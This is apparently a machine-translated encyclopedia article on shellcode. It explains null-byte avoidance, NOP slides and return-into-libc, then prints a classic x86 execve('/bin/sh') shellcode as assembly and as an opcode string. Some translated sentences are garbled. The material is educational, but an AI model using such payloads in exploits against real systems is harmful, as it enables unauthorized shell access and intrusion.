Shellcode

Shellcode is a programming term and describes a mostly very small patch of assembler instructions converted into opcodes , with which the intention is to manipulate a program or system or to use it for purposes not intended. It often tries to start a shell , hence the name. Shellcodes have their origins in buffer overflow and other code injection attacks, but they can also be used in software , especially penetration tests , in experimentation and in didactics.

Creating shellcodes

To generate shell code, the command to be executed can be written in C and translated with a compiler . The generated program is now disassembled (re-translated) and the functionality of the program reprogrammed in assembly language. Many instructions can be omitted or shortened. With many exploits , the shell code must not contain a 0 byte because this marks the end of the string in C. In general, other obstacles have to be avoided, for example only letters and numbers are allowed or upper and lower case letters are changed, or certain offsets have to be adhered to, which can be achieved, for example, by filling in more or less creative chains of zero operations (so-called NOP slides ) can be.

Instead of executing your own code, which is not always possible (for example when using memory protection ), you can also jump directly to the desired functions that are available, for example, in the program itself or a loaded library , for example libc. This procedure is called return into libc .

example

Local execve (/ bin / sh) shellcode

The assembler code (x86 architecture):

void main() {
__asm__("
jmp 0x2a            # 3 bytes - springt direkt vor den String
popl %esi           # 1 byte - Adresse des Strings wird in esi geladen
movl %esi,0x8(%esi) # 3 bytes - die Adresse des Strings wird in den Speicher geschrieben
movb $0x0,0x7(%esi) # 4 bytes - der String wird nullterminiert
movl $0x0,0xc(%esi) # 7 bytes - ein nullpointer für das environment
movl $0xb,%eax      # 5 bytes - syscall-nummer in eax
movl %esi,%ebx      # 2 bytes - ebx enthält die adresse von "/bin/sh"
leal 0x8(%esi),%ecx # 3 bytes - argumente, ein pointer auf den string und ein nullpointer
leal 0xc(%esi),%edx # 3 bytes - environment
int $0x80           # 2 bytes - interrupt wird ausgelöst
movl $0x1, %eax     # 5 bytes - exit-interrupt
movl $0x0, %ebx     # 5 bytes - wird vorbereitet
int $0x80           # 2 bytes - interrupt wird ausgelöst
call -0x2f          # 5 bytes - ein call zurück, dabei wird der eip auf den Stack gepusht
.string \"/bin/sh\" # 8 bytes
");
}

The opcode string:

char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

However, this code is not very clever because it contains null bytes and is quite long. To avoid “unwanted characters”, encoders are often used, which enable masking and later unmasking of these characters and possibly also compress the shellcode. There are also other techniques for finding out the address of the string than a "jmp" or "call". For example, it is possible to just /bin/shpush on the stack. The esp then contains the address.

literature

Jack Koziol: The Shellcoder's Handbook. Discovering and Exploiting Security Holes. Wiley, Indianapolis IN 2004, ISBN 0-7645-4468-3 .
Jon Erickson: Forbidden Code. mitp, Bonn 2004, ISBN 3-8266-1457-7 .

Web links

Shellcode database

Individual evidence

↑ Source: phrack.org ( Memento from February 11, 2008 in the Internet Archive )

[1] Source: phrack.org ( Memento from February 11, 2008 in the Internet Archive )